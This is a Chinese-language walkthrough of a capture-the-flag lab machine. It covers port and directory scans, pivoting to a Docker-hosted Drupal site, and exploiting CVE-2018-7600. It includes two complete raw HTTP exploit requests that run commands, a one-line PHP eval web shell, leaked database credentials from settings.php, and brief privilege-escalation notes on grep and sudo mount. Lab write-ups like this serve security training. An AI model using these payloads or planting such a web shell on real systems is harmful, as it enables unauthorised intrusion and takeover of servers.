Nmap #
[root@Hacking] /home/kali/Lujo
❯ nmap 192.168.55.157 -A -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-21 17:13 CST
Nmap scan report for 192.168.55.157
Host is up (0.00026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 af:79:a1:39:80:45:fb:b7:cb:86:fd:8b:62:69:4a:64 (ECDSA)
|_ 256 6d:d4:9d:ac:0b:f0:a1:88:66:b4:ff:f6:42:bb:f2:e5 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: LuxeCollection - Art\xC3\xADculos de Lujo Exclusivos
Dir scan #
[root@Hacking] /home/kali/Lujo
❯ dirsearch -u http://192.168.55.157
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.55.157/
[17:16:08] Scanning:
[17:16:09] 403 - 279B - /.php
[17:16:15] 200 - 15KB - /index.html
[17:16:18] 301 - 318B - /scripts -> http://192.168.55.157/scripts/
[17:16:18] 200 - 937B - /scripts/
[17:16:18] 403 - 279B - /server-status
[17:16:18] 403 - 279B - /server-status/
[17:16:19] 301 - 317B - /styles -> http://192.168.55.157/styles/
Task Completed
[root@Hacking] /home/kali/Lujo
❯ feroxbuster -u http://192.168.55.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.55.157
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 221l 524w 5600c http://192.168.55.157/scripts/main.js
200 GET 231l 411w 3799c http://192.168.55.157/styles/responsive.css
200 GET 168l 285w 2899c http://192.168.55.157/styles/components.css
200 GET 230l 445w 4172c http://192.168.55.157/styles/main.css
200 GET 285l 778w 15656c http://192.168.55.157/
301 GET 9l 28w 318c http://192.168.55.157/scripts => http://192.168.55.157/scripts/
301 GET 9l 28w 317c http://192.168.55.157/styles => http://192.168.55.157/styles/
[####################] - 2m 661674/661674 0s found:7 errors:0
[####################] - 2m 661638/661638 4945/s http://192.168.55.157/
[####################] - 1s 661638/661638 1070612/s http://192.168.55.157/scripts/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 0s 661638/661638 220546000/s http://192.168.55.157/styles/ => Directory listing (add --scan-dir-listings to scan)
什么也没有扫到,那么就从页面里找信息,发现有一些人名
Fscan #
没有可以直接利用的东西,不过发现存在内网IP
Sophia@TheHackersLabs-PaQueAigaLujo:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:fa:17:4c brd ff:ff:ff:ff:ff:ff
inet 192.168.55.157/24 brd 192.168.55.255 scope global dynamic enp0s3
valid_lft 430sec preferred_lft 430sec
inet6 fe80::a00:27ff:fefa:174c/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:98:51:14:67 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:98ff:fe51:1467/64 scope link
valid_lft forever preferred_lft forever
5: veth1f12689@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 26:72:89:97:fe:63 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::2472:89ff:fe97:fe63/64 scope link
valid_lft forever preferred_lft forever
对172进行扫描,发现存在drupal漏洞
Sophia@TheHackersLabs-PaQueAigaLujo:~$ ./fscan-RNDGcFJu -h 172.17.0.2
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-08-21 11:27:11] [INFO] 暴力破解线程数: 1
[2025-08-21 11:27:11] [INFO] 开始信息扫描
[2025-08-21 11:27:11] [INFO] 最终有效主机数量: 1
[2025-08-21 11:27:11] [INFO] 开始主机扫描
[2025-08-21 11:27:11] [INFO] 有效端口数量: 233
[2025-08-21 11:27:11] [SUCCESS] 端口开放 172.17.0.2:80
[2025-08-21 11:27:16] [SUCCESS] 服务识别 172.17.0.2:80 => [http]
[2025-08-21 11:27:17] [INFO] 存活端口数量: 1
[2025-08-21 11:27:17] [INFO] 开始漏洞扫描
[2025-08-21 11:27:17] [INFO] 加载的插件: webpoc, webtitle
[2025-08-21 11:27:17] [SUCCESS] 网站标题 http://172.17.0.2 状态码:200 长度:8756 标题:Welcome to Find your own Style | Find your own Style
[2025-08-21 11:27:23] [SUCCESS] 目标: http://172.17.0.2:80
漏洞类型: poc-yaml-drupal-cve-2018-7600-rce
漏洞名称: drupal8
详细信息:
links:https://github.com/dreadlocked/Drupalgeddon2
https://paper.seebug.org/567/
[2025-08-21 11:27:37] [SUCCESS] 扫描已完成: 2/2
RCE #
原理可以查看
搭建代理这里就不废话了,如下发包可以进行命令执行
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://172.17.0.2
Connection: keep-alive
Referer: http://172.17.0.2/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Upgrade-Insecure-Requests: 1
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
POST /user/register?element_parents=account/mail/%23value&ajax_form=1 HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://172.17.0.2
Connection: keep-alive
Referer: http://172.17.0.2/user/register?element_parents=account/mail/%23value&ajax_form=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
form_id=user_register_form&mail%5B0%5D%5B%23lazy_builder%5D%5B0%5D=passthru&mail%5B0%5D%5B%23lazy_builder%5D%5B1%5D%5B0%5D=ls+-al
Bind shell #
给网站目录写一个木马
echo '<?php eval($_POST[a]);?>' > shell.php
(www-data:/var/www/html) $ grep -r 'ballenita' .
Binary file ./sites/default/files/.ht.sqlite matches
./sites/default/settings.php: * 'username' => 'ballenita',
./sites/default/settings.php: * 'password' => 'ballenitafeliz', //Cuidadito cuidadín pillin
(www-data:/var/www/html) $
不太好拿shell,我这里用msf做了一个传上去
Read Pass #
提升一下TTY切换用户,可以用grep读取任意文件
Root #
查看sudo发现可以用mount
